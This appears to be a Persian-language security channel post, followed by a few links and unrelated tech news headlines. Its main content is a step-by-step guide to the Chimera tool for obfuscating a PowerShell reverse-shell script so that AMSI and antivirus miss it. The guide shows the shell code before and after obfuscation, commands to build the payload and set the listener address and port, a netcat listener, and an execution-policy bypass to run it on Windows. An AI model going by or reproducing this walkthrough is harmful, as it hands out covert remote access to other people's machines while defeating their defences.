ابزار Chimera ابزاری برای Obfuscate کردن اسکریپ های پاورشل برای بایپس AMSI ( Anti Malware Scan Interface ) و انتی ویروس ها هست.

تیکه کد زیر بخشی از Invoke-PowerShellTCP.ps1 هست که توسط 25 تا از انتی ویروس ها شناسایی شده : ( مشاهده عکس )

$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`n Copyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
$stream.Write($sendbytes,0,$sendbytes.Length)
$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
$stream.Write($sendbytes,0,$sendbytes.Length)

اما تیکه کد زیر بعد از Obfuscate کردن کد بالا توسط ابزار Chimera هست که هیچ آنتی ویروسی نتونسته تشخیص بده : ( مشاهده عکس )

$xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov = $jYODNAbvrcYMGaAnZHZwE."$bnyEOfzNcZkkuogkqgKbfmmkvB$ZSshncYvoHKvlKTEanAhJkpKSIxQKkTZJBEahFz$KKApRDtjBkYfJhiVUDOlRxLHmOTOraapTALS"()
[bYte[]]$mOmMDiAfdJwklSzJCUFzcUmjONtNWN = 0..65535|%{0}
$PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK = ([teXt.enCoDInG]::AsCII)."$mbKdotKJjMWJhAignlHUS$GhPYzrThsgZeBPkkxVKpfNvFPXaYNqOLBm"("WInDows Powershell rUnnInG As User " + $TgDXkBADxbzEsKLWOwPoF:UsernAMe + " on " + $TgDXkBADxbzEsKLWOwPoF:CoMPUternAMe + "`n CoPYrIGht (C) 2015 MICrosoft CorPorAtIon. All rIGhts reserveD.`n`n")
$xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov.WrIte($PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK,0,$PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK.LenGth)

➖➖➖➖➖➖➖➖
✅ نحوه ی نصب در Linux :
1. نصب پیش نیاز ها :
sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git

2. کلون کردن ریپو :
sudo git clone https://github.com/tokyoneon/chimera /opt/chimera

3. تغییر سطح دسترسی اسکریپت به روت ( اگرکاربر روت نیستید ) :
sudo chown root:root -R /opt/chimera/

4. تغییر مسیر به opt/chimera/ :
cd /opt/chimera/

5. تغییر دسترسی اسکریپت به قابلیت اجرا شدن :
sudo chmod +x chimera.sh

6. نهایتا با دستور زیر میتونید اسکریپت رو اجراکنید :
./chimera.sh —help
➖➖➖➖➖➖➖➖
✅ نحوه ی استفاده از اسکریپت :
1. ساخت Payload :
./chimera --file Shell_Code.ps1 --all --output /tmp/payload.ps1

2. جایگزین کردن ListenerIP/TargetIP و ListenerPort/TargetPort در داخل پیبود :
1.2 تغییر ایپی :
sed -i 's/Listener_IP/Target_IP/g' shells/Payload.ps1
2.2 تغییر پورت :
پورت دیفالت اسکریپت 444 هستش :
sed -i 's/4444/Target_Port/g' shells/*.ps1
➖➖➖➖➖➖➖➖
✅ گرفتن دسترسی :
1. ایجاد Listener در لینوکس با NetCat :
nc -v -l -p 4444
2. فایل رو روی پاورشل ویندوز با دستور زیر اجرا کنید :
powershell.exe -ep bypass C:\<PATH>\Payload.ps1

و تمام.
امیدوارم از آموزش خوشتون بیاد...
Author : X P 4
Special Tnx to : AK47

AI Exploits

This repository, ai-exploits, is a collection of exploits and scanning templates for responsibly disclosed vulnerabilities affecting machine learning tools..:

https://github.com/protectai/ai-exploits

یک آزمایشگاه کوچیک خوب برای تمرین و روش های دور زدن Antivirus , EDR

🟡 Little AV/EDR bypassing lab for training & learning purposes


🌐 https://github.com/Xacone/BestEdrOfTheMarket

ChatGPT generates fake data set to support scientific hypothesis
Article, Comments

OpenSSL Announces Final Release of OpenSSL 3.2.0
Article, Comments

Subnoscript is now open-source
Article, Comments

Basic Interpreter Hidden in ESP32 Silicon
Article, Comments

Unix Shells and the Current Directory
Article, Comments

PipeWire 1.0.0
Article, Comments

My Toddler Loves Planes, So I Built Her a Radar
Article, Comments

GitHub is investigating an incident with Pull Requests, Issues and Webhooks
Article, Comments

C++ Memory Model: Migrating from x86 to ARM
Article, Comments

Modern C++ Programming Course
Article, Comments